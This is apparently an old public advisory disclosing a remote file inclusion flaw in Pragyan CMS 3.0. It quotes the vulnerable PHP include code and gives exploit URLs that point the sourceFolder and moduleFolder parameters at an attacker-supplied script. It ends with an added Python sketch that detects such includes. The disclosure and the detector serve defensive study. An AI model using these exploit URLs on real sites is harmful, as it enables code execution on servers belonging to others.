Pragyan CMS 3.0 Remote File Inclusion Vulnerability

2010-10-22 / 2010-10-23
Credit: Cru3l.b0y
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+] Exploit Title: Pragyan CMS 3.0 Remote File Inclusion Vulnerability
[+] Date: 2010-10-21
[+] Author : Cru3l.b0y
[+] Software Link: http://switch.dl.sourceforge.net/project/pragyan/pragyan/3.0/pragyanv3.0-alpha.tar.bz2
[+] Version: 3.0
[+] Tested on: Ubuntu 10.10
[+] Contact : Cru3l.b0y@gmail.com
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, Arash, Kose Ameye Baghie
[+] register_globals = On

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[+] Vul Code [1]: "/cms/modules/form.lib.php" (lines 37-43)

    global $sourceFolder;
    global $moduleFolder;
    require_once("$sourceFolder/$moduleFolder/form/editform.php");
    require_once("$sourceFolder/$moduleFolder/form/editformelement.php");
    require_once("$sourceFolder/$moduleFolder/form/registrationformgenerate.php");
    require_once("$sourceFolder/$moduleFolder/form/registrationformsubmit.php");
    require_once("$sourceFolder/$moduleFolder/form/viewregistrants.php");

[+] Exploit [1]:

    http://target/path/cms/modules/form.lib.php?sourceFolder=script

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[+] Vul Code [2]: "/cms/modules/search/search.php" (lines 31-33)

    $searchModuleFolder = "$sourceFolder/$moduleFolder/search";
    $include_dir = "$searchModuleFolder/include";
    include ("$include_dir/commonfuncs.php");

[+] Exploit [2]:

    http://target/path/cms/modules/search/search.php?moduleFolder=script
    http://target//path/cms/modules/search/search.php?sourceFolder=script
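An added audit sketch, not part of the original advisory or of Pragyan's code: it flags include/require statements whose path traces back to variables the file itself never assigns, which is the pattern in both quoted snippets and is what lets the request supply them when register_globals = On. The regex heuristic, the function names and the `safe.php` sample are assumptions made for illustration.

```python
import re

# Sample input constructed from the two snippets quoted in the advisory, plus
# one constructed file (safe.php) that sets its own path variable.
SAMPLES = {
    "form.lib.php": '''<?php
global $sourceFolder;
global $moduleFolder;
require_once("$sourceFolder/$moduleFolder/form/editform.php");
''',
    "search.php": '''<?php
$searchModuleFolder = "$sourceFolder/$moduleFolder/search";
$include_dir = "$searchModuleFolder/include";
include ("$include_dir/commonfuncs.php");
''',
    "safe.php": '''<?php
$base = dirname(__FILE__);
require_once("$base/lib/util.php");
''',
}

VAR = re.compile(r"\$([A-Za-z_]\w*)")
ASSIGN = re.compile(r"^\s*\$([A-Za-z_]\w*)\s*=(?!=)\s*(.*)$")
INCLUDE = re.compile(r"^\s*(?:include|require)(?:_once)?\b(.*)$")

def unset_sources(expr, origin):
    """Names in expr that trace back to variables never assigned in this file."""
    deps = set()
    for name in VAR.findall(expr):
        deps |= origin.get(name, {name})  # unknown variable: it is its own source
    return deps

def audit(source):
    """Return [(line_no, [unassigned variables])] for each include/require whose
    path depends on a variable this file never sets. A `global $x;` declaration
    is deliberately not counted as an assignment."""
    origin = {}    # variable -> unassigned names it derives from (empty = set locally)
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        assign = ASSIGN.match(line)
        if assign:
            origin[assign.group(1)] = unset_sources(assign.group(2), origin)
            continue
        include = INCLUDE.match(line)
        if include:
            deps = unset_sources(include.group(1), origin)
            if deps:
                findings.append((no, sorted(deps)))
    return findings
```

Line numbers in the findings are relative to the constructed samples, not to the files in the Pragyan tarball.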

